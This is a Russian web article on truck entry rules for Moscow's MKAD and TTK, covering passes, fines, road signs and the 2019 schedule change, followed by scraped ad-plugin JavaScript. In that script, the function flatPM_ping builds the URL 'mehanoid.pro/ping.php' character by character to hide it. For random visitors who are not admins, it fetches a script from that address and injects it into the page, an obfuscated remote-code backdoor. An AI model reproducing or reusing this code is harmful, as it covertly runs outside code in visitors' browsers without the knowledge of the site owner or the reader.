Ограничения грузового транспорта

Въезд грузовиков на МКАД, ТТК и в Москву

Нововведения на законодательном уровне о порядке проезда грузовиков на территории Москвы проводилось в три этапа, в каждом из которых вносились дополнительные изменения в порядок проезда.

Порядок проезда грузовиков по МКАДу в 2019 году

С 2019 установлены следующий порядок въезда на территорию Москвы:

  • В пределах третьего кольца МКАД введён запрет въезда транспортных средств, грузоподъёмность которых составляет более одной тонны.
  • В пределах московской кольцевой автомобильной дороги введён запрет въезда транспортных средств с массой более двенадцати тонн.
  • Запрет действует каждый день с 6 00 – 22 00 часов.

К транспортным средствам с массой более двенадцати тонн можно отнести ТС, обладающие грузоподъёмностью более восьми тонн, а также грузовые машины, имеющие грузоподъёмность до двадцати тонн.

Масса транспортного средства и его грузоподъёмность являются разными понятиями.

Также существуют ограничения на въезд грузовых транспортных средств на основании экологического класса, указываемого в ПТС машины:

  • Транспортные средства, имеющие экологический класс меньше второго, не имеют права въезда в центр столицы и на территорию МКАДа;
  • Транспортные средства, имеющие экологический класс меньше третьего, не имеют права въезда в центр столицы и на территорию третьего транспортного кольца.

Существуют иные ограничения въезда: в период с мая по октябрь вводится запрет на въезд фурам на МКАДа в пятницу, выходные и в период праздничных дней с 6 00 до 00 00 часов.

Знать наизусть правила въезда грузового транспорта на территорию Москвы необязательно, достаточно обращать внимание на соответствующие дорожные знаки. Например, обращать внимание на надписи вроде “сегодня движения грузового транспорта по МКАД открывается в . ”

Ограничения въезда на территорию Москвы не действуют на следующие виды транспортных средств:

  • Машины скорой помощи, пожарной охраны, правоохранительных органов, аварийной службы, военной инспекции и другое;
  • Машины, имеющие отношение к международному договору, который предполагает наличие пропуска;
  • Машины ЖКУ и ТЭХ;
  • Машины почтовой службы;
  • Эвакуационная техника;
  • Транспортные средства, получившие соответствующий пропуск.

Правила въезда грузового транспорта в Москву в 2019 году

Чтобы иметь возможность въезда на территорию Москвы в дневное время необходимо оформить соответствующий пропуск, который бывает двух видов:

  • Одноразовый, действующий не более пяти суток;
  • Имеющий срок действия не более одного года.

Для оформления пропуска необходимо предоставить следующий пакет документов:

  • Заявление;
  • Пaспорт;
  • Пaспорт транспортного средства;
  • Свидетельство o регистрации ТС;
  • Диaгностическая карта ТС;
  • Вoдительские права заявителя.

Необходимый перечень документов может различаться в зависимости от иных факторов оформления пропуска, окончательный список можно узнать, обратившись в Департамент транспорта Москвы.

В случае нарушения правил въезда на территорию Москвы предполагаются штрафные санкции от 500 до 5000 рублей.

Въезд грузовиков на третье транспортное кольцо

Существует следующий порядок проезда внутри третьего транспортного кольца:

  • Возможность въезда транспортных средств грузоподъёмность которых составляет не более одной тонны.
  • Машины, имеющие грузоподъёмность больше одной тонны могут передвигаться внутри третьего транспортного кольца в период с 6 00 – 22 00 часов с оформленным пропуском.
  • В иное время суток проезд является без ограничений.

Въезд в центр Москвы и ТТК на ГАЗели

Машины, имеющие грузоподъемность от 1-ой тонны, не могут въезжать на московскую кольцевую дорогу, в том числе и на ТТК, без соответствующего пропускного документа в дневное время (6.00-22.00).

В Москве изменился график передвижения грузовиков

С 14 января изменился порядок оформления разовых пропусков для грузового транспорта. А время, ограничивающее передвижение грузовиков по городу, стало единым в течение всего года, вне зависимости от праздников и времени года – с 6.00 до 22.00. Это упростит водителям порядок въезда в город, так как время всегда будет единое и не возникнет путаницы с днями недели. Кроме того, для города пропадает необходимость дважды в год осуществлять перенастройку камер фото и видеофиксации.

Напомним, что до 14 января ограничения на въезд в Москву устанавливались по графику, который менялся на протяжении года: с 1 мая по 1 октября по пятницам, субботам, воскресеньям, накануне нерабочих праздничных дней, по нерабочим праздничным дням – с 6.00 до 24.00. В остальные дни – с 6.00 до 22.00.

Правила въезда, связанные с грузоподъемностью, остались прежние: автотранспорту грузоподъемностью более одной тонны запрещено движение в дневное время в пределах Третьего транспортного кольца (ТТК) и по ТТК; для грузовых автомобилей с максимальной массой более 12 тонн запрещены въезд и движение днем в пределах МКАД и по МКАД.

Изменения также коснулись порядка оформления разовых пропусков на въезд в Москву грузового транспорта. Получить разовый пропуск (сроком действия не более 5 суток) на одно транспортное средство заявители могут не более двух раз в месяц. Срок рассмотрения таких запросов увеличится до 8 рабочих часов. Эти изменения введены, чтобы повысить качество предоставления государственных услуг, а также лишить недобросовестных перевозчиков возможности злоупотреблять правом во время подачи документов.

«Мы учитываем ту огромную важность для жизнедеятельности Москвы, которую обеспечивает качественная грузовая логистика. Будем прикладывать максимальные усилия для того, чтобы необходимые москвичам товары и грузы своевременно доставлялись, но при этом обеспечивалась оптимальная загрузка городских дорог», — отметили в пресс-службе Центра организации дорожного движения Правительства Москвы.

согласно статистике ГИБДД, в 2016 году количество ДТП по вине водителей грузовых автотранспортных средств составило 749 происшествий, в результате которых погибло 57 и ранено 885 человек. В 2017 году количество ДТП по вине водителей грузового автотранспорта снизилось на 12,8% и составило 653 происшествия, в результате которых погибло 55 и ранено 727 человек

Ограничения на движение грузового автотранспорта

в городе Москве

Ограничения по времени въезда

Грузовые автомобили грузоподъемностью более 1 тонны не могут въезжать на ТТК, включая зону, ограниченную ТТК, с 6 утра до 22 часов вечера .

Также запрещается въезд и движение грузового автотранспорта грузоподъемностью более 1 тонны в период с 1 мая по 1 октября (ежегодно) с 6.00 до 24.00 по пятницам, субботам, воскресеньям, накануне нерабочих праздничных дней, и по нерабочим праздничным дням, по территории города Москвы ограниченной ТТК, и по ТТК .

Под эти ограничения попадают такие наши автомобили, как Ситроен Джампер и Хундай HD65.

Штраф за это нарушение — 5000 р.

Ограничение на движение грузовиков в населенных пунктах

При движении на грузовом автомобиле с разрешенной максимальной массой более 2,5 тонн по дороге с двумя полосами можно занимать любую полосу, но на дорогах с тремя полосами и более, нельзя занимать крайнюю левую полосу.

На дорогах с тремя полосами и более такие грузовые автомобили могут занимать крайнюю левую полосу только для поворота налево и разворота . (Пункт 9.4 ПДД)

Под это ограничение попадают все наши грузовые автомобили, кроме Пежо Партнер.

Ограничение на движение грузовиков вне населенных пунктов

Грузовые автомобили массой более 2.5 тонны могут выезжать на левую полосу только для поворота налево или разворота , если дорога имеет 3 или более полос в данном направлении. (Пункт 9.4 ПДД)

За это нарушение грозит штраф — 1500 р.

Ограничение на движение грузовых автомобилей по автомагистралям

На автомагистралях и дорогах для автомобилей (обозначенных соответствующими знаками) грузовые автомобили категории С (более 3,5 тонн) могут двигаться только по двум правым полосам . Выезжать на остальные полосы им запрещено . Будьте внимательны при движении по МКАД. (Пункт 16.1 ПДД)

Под это ограничение попадает Хундай HD65.

Грузовой каркас

В ВАО и САО действуют правила ограничения движения грузового автотранспорта — «грузовой каркас». Это перечень улиц, по которым разрешено движение транспортных средств с максимальной массой более 2.5 тонн.

По улицам, не входящим в грузовой каркас, движение не запрещено, если а) вы там живете, б) вы обслуживаете находящееся там предприятие. К месту погрузки или выгрузки необходимо подъезжать с ближайшего перекрестка грузового каркаса. Если вас остановит сотрудник ГИБДД, вы обязаны предъявить документы, подтверждающие законность ваших действий.

Транзитное движение по улицам вне грузового каркаса, запрещено. Штраф большой, 5000 рублей.

К счастью, наш пункт выдачи автотранспорта входит в грузовой каркас. Учитывайте эти ограничения на движение грузовых автомобилей и планируйте свой маршрут.

Знак “Движение грузового транспорта запрещено”

Одним из составляющих элементов ПДД являются знаки. Они выступают в качестве регуляторов движения. Одним из составляющих системы знаков выступает «Движение грузового транспорта запрещено», который своим объектом имеет транспортные средства, масса которых превышает установленную знаком величину или 3,5 тонны по умолчанию. Таким образом, водители фургонов, автоцистерн, самосвалов и других грузовых транспортных средств должны соблюдать установленный запрет при въезде в населенный пункт.

Почему устанавливается запрет на движение грузового транспорта?

Причины установления дорожного знака о запрете или ограничении движения крупногабаритных машин очевидны и обусловлены назначением грузового транспорта. Основные цели ограничения или полного запрета участия в движении данного вида транспортных средств сводятся к следующим:

  • предотвратить создание блокировочных ситуаций на дороге, пробок, вызванных высокогабаритными машинами;
  • ограничить выброс вредных веществ в окружающую среду;
  • свести к минимуму уровень шума на определенном участке дороги;
  • увеличить время сохранности асфальтового покрытия;
  • предотвратить возникновение аварийных ситуаций.

Стоит отметить, что запрет действует на определенные модели транспорта.

На какие виды транспорта действие знака распространяется?

Запрет распространяется на все виды транспорта, попадающие под категорию «грузовые транспортные средства». При этом, если знак имеет цифру, то объектом запрета выступают только машины, превышающие данную массу. При отсутствии таковой, запрет распространяется на все грузовые автомобили, масса которых выше 3,5 тонн. В дополнение к общему правилу существует ряд ограничивающих указателей, адресованных водителям грузовиков — 3.3, 3.4, 3.7. Зона действия знака 3.3 ограничивает движение на своих участках всех грузовиков. Зона действия указателя 3.4 не допускает участия на дороге некоторых определенных грузовиков. Зона действия знака 3.7 запрещает поток грузовых автомобилей с прицепом.

Из данного правила существуют исключения, касающиеся некоторых видов транспорта. Таким образом, действие знака не распространяется на:

  • транспорт государственной почтовой службы;
  • крупногабаритные машины коммунальных служб, обслуживающих населенные пункты;
  • грузовые автомобили, принадлежащие на праве собственности предприятиям, находящимся в зоне действия указателя;
  • ТС, предназначенные для перевозки людей;
  • транспортные средства, которые перевозят инвалидов I и II группы инвалидности.

Как обойти запрет, рассмотрим далее в статье.

Можно ли въезжать в город, если действует запрет на движение грузового транспорта?

Запрет на движение грузового транспорта можно обойти в некоторых ситуациях. Закон предусматривает систему специальных пропусков, разрешающих водителю грузовика при наличии срочного груза въезд в город и передвижение в зоне ограничения определенный промежуток времени.

Выделяют краткосрочные, не более чем на 5 дней, пропуска и долгосрочные, сроком на 1 год. Кроме этого, запрещающий знак может действовать в определенное время, за пределами которого прохождение грузового автотранспорта разрешено.

Штраф за нарушение закона

Нарушение ПДД в части запрета дорожного движения грузовым автотранспортом влечет привлечение к административной ответственности и наложение штрафа в сумме 500 рублей. Касаемо городов Москва и Санкт-Петербург, штраф за проезд на знак “Движение грузового транспорта запрещено” достигает 5000 рублей. Это обусловлено высоким потоком транспортных средств в городах федерального значения.

Можно ли обжаловать наказание?

Оспорить штраф, установленный Постановлением инспектора ГИБДД за противоправный проезд или движение грузовика в зоне ограничения, возможно двумя способами. Первый предполагает подачу жалобы вышестоящему сотруднику службы ГИБДД в течение 10 дней с момента получения извещения. Второй способ направляет инициатора в районный суд.

В каждом конкретном случае имеются свои особенности, но они сводятся к опровержению доводов инспектора о незаконности въезда или движения грузовика в конкретной зоне. Одним из основополагающих этапов процесса обжалования постановления выступает оспаривание составленного сотрудником ГИБДД протокола по факту нарушения запрета. Поэтому в случае несогласия с мнением инспектора следует сделать об этом соответствующую запись.

Запрет на осуществление движения грузовым транспортом призван ограничить движение грузового транспорта на дорогах. Это по сути целая система знаков, каждый из которых имеет в качестве объекта свой конкретный вид транспорта, а также степень ограничения движения и время.

С января 2019 года изменился порядок въезда грузового транспорта в Москву

ЦОДД Правительства Москвы объявил об изменении порядка въезда грузового транспорта в столицу, а также правил выдачи разовых разрешений с 14 января 2019 года.

Что изменилось?

  • Ранее грузовики могли въезжать в город по следующему графику: с 1 мая по 1 октября в пятницу, субботу, воскресенье, по нерабочим праздничным дням и накануне — с 00:00 до 6:00, в остальные дни — с 22:00 до 6:00. Теперь установлено единое время — с 22:00 до 6:00, и оно не зависит от дней недели и месяца.
  • Ранее разовый пропуск на одно ТС выдавался неограниченное количество раз. Теперь он выдается максимально 2 раза в месяц на одно транспортное средство на срок до 5 суток. При этом период рассмотрения запроса увеличился до 8 часов.

Что осталось неизменным?

  • Запрет на передвижение в дневное время по ТТК и внутри него ТС грузоподъемностью более 1 тонны.
  • Запрет на передвижение в дневные часы по МКАД и въезд в город авто грузоподъемностью более 12 тонн.

В чем смысл изменений?

Они направлены на искоренение путаницы для участников движения, а также уменьшение количества злоупотреблений при выдаче разрешений. Кроме того, отпадет необходимость перенастраивать тысячи дорожных камер, следящих за нарушениями ПДД, и перекроется транзитный трафик, загружающий городские дороги.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie("flat_r_mb","zen.yandex"),flat_userVars.referer="zen.yandex");var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(o,"<$1>$2>")+r[2],l=r[0];l--;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"ng"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,l='
'+a+" через "+o+'
'+r+'
',i=e.once;n(t).each(function(){var e=n(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==l.indexOf("go"+"oglesyndication")?t.append(l):flatPM_setHTML(t[0],l),e.find(".flat__4_video_flex").one("click",function(){n(this).addClass("show")})}),n("body").on("click",".flat__4_video_item_hover",function(){var e=n(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),r=parseInt(o),l=setInterval(function(){a.text(--r),r<=0&&(clearInterval(l),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){n(this).closest(".flat__4_video_flex").remove(),"true"==i&&n(".flat__4_video_flex").remove()})}